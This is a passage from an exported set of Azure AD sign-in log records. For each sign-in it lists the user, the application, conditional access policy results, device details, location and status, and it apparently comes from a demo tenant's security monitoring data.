{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",99101c3d-fa2a-42b6-a9d2-fbb9c04b1c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,99101c3d-fa2a-42b6-a9d2-fbb9c04b1c00,SigninLogs,Sucess,33.7984581,-84.38828278
+603,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:28.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a7180b7e-6808-4ac2-9340-c973bb0ea98c,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:18,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Chrome 80.0.3987', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",f132c322-8c82-4899-af58-5ed4abc22200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f132c322-8c82-4899-af58-5ed4abc22200,SigninLogs,Sucess,29.4803009,-81.21395111
+604,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:06.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9ccc12eb-5138-4225-bde2-0dd8f0176df5,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Reporting Web Services,[],notApplied,09/04/2020 17:55,{'deviceId': ''},818ddda4-c0b9-4b32-b709-e11793771c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,818ddda4-c0b9-4b32-b709-e11793771c00,SigninLogs,Sucess,38.73078156,-78.17196655
+605,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:44.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,8d88539c-7f16-4fed-a521-efcf92d35a44,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",268d392c-7163-4a17-b774-5f4f087f1c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,268d392c-7163-4a17-b774-5f4f087f1c00,SigninLogs,Failed,33.7984581,-84.38828278
+606,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:46.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8d88539c-7f16-4fed-a521-efcf92d35a44,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",99101c3d-fa2a-42b6-a9d2-fbb9c04b1c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,99101c3d-fa2a-42b6-a9d2-fbb9c04b1c00,SigninLogs,Sucess,33.7984581,-84.38828278
+607,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:10.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e49788d9-44f6-4ff5-a30c-7423c3917e00,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",268d392c-7163-4a17-b774-5f4fcd821c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,268d392c-7163-4a17-b774-5f4fcd821c00,SigninLogs,Sucess,33.7984581,-84.38828278
+608,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:32.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f17146f0-6c6d-42dc-833a-9f316f136ccf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",11779f6a-e330-484b-9e89-76d99a271f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,11779f6a-e330-484b-9e89-76d99a271f00,SigninLogs,Sucess,36.6404686,-78.26995087
+609,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:26.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:51,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",b86f5335-baa1-4c12-a8cc-a6400d891c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.14311981201172, 'latitude': 47.474830627441406}, 'state': 'Washington', 'city': 'Renton'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,b86f5335-baa1-4c12-a8cc-a6400d891c00,SigninLogs,Sucess,47.47483063,-122.1431198
+610,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:53.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c1f2e17e-30b6-4474-baa7-f2318e7976fa,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 